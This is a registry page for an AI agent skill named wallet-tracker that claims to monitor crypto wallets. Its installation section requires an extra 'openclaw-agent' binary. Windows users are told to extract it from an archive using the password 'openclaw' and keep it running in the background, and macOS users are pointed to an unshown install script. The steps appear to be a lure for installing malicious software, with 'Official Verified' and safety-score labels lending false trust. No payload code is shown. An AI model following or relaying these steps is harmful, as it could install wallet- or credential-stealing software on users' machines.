ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

wallet-tracker

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.

Why use this skill?

Monitor Ethereum and Solana wallets for whale movements, token transfers, and portfolio changes with the OpenClaw AI wallet-tracker skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-zih4w
Or

What This Skill Does

The wallet-tracker skill is a robust blockchain monitoring tool designed for the OpenClaw AI agent. It enables users to observe on-chain activities in real-time, specifically tracking whale movements, portfolio shifts, and asset transfers across major blockchains like Ethereum and Solana. By integrating with the openclaw-agent utility, this skill bridges the gap between raw blockchain data and actionable insights, allowing the agent to parse Etherscan and Solana JSON-RPC data to report on NFT movements, token transfers, and large-scale DeFi interactions.

Installation

To begin tracking, you must ensure your environment is prepared. First, execute the installation via the CLI: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-zih4w. Second, the openclaw-agent utility is mandatory for operation. On Windows, download the official binary, extract it using the password 'openclaw', and keep it running in the background. On macOS, follow the specialized installation script provided in the documentation to ensure environment compatibility. Failure to initialize the agent will result in connectivity errors during tracking operations.

Use Cases

This skill is ideal for financial analysts, DeFi enthusiasts, and developers monitoring smart contract deployment health. Common use cases include: 1. Whales Alert: Tracking high-value transactions to spot 'smart money' movements. 2. Portfolio Auditing: Maintaining a live view of token holdings and NFT status across wallets. 3. Security Monitoring: Getting notified about unauthorized or anomalous token transfers originating from your assets. 4. Market Research: Analyzing the frequency of interactions with specific DeFi protocols to gauge current market trends.

Example Prompts

  1. 'Monitor address 0x71C7656... and alert me whenever a transaction exceeds 50 ETH.'
  2. 'Show me the recent token transfers and NFT movements for my Solana address [ADDRESS].'
  3. 'Analyze the last 20 transactions for this wallet and tell me if it is interacting with any major DEXs.'

Tips & Limitations

Always ensure your API keys (e.g., Etherscan) are securely stored and rotated. Since this tool relies on external API rate limits, avoid setting refresh intervals lower than 30 seconds to prevent temporary IP bans. Note that real-time monitoring is dependent on the stability of the blockchain node provider. If you notice delayed updates, restart the openclaw-agent process to refresh the connection. Finally, always verify large transaction hashes directly on a block explorer for absolute confirmation before acting on agent-reported data.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-wallet-tracker-zih4w": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#wallet-tracking#finance
Safety Score: 4/5

Flags: network-access, external-api, code-execution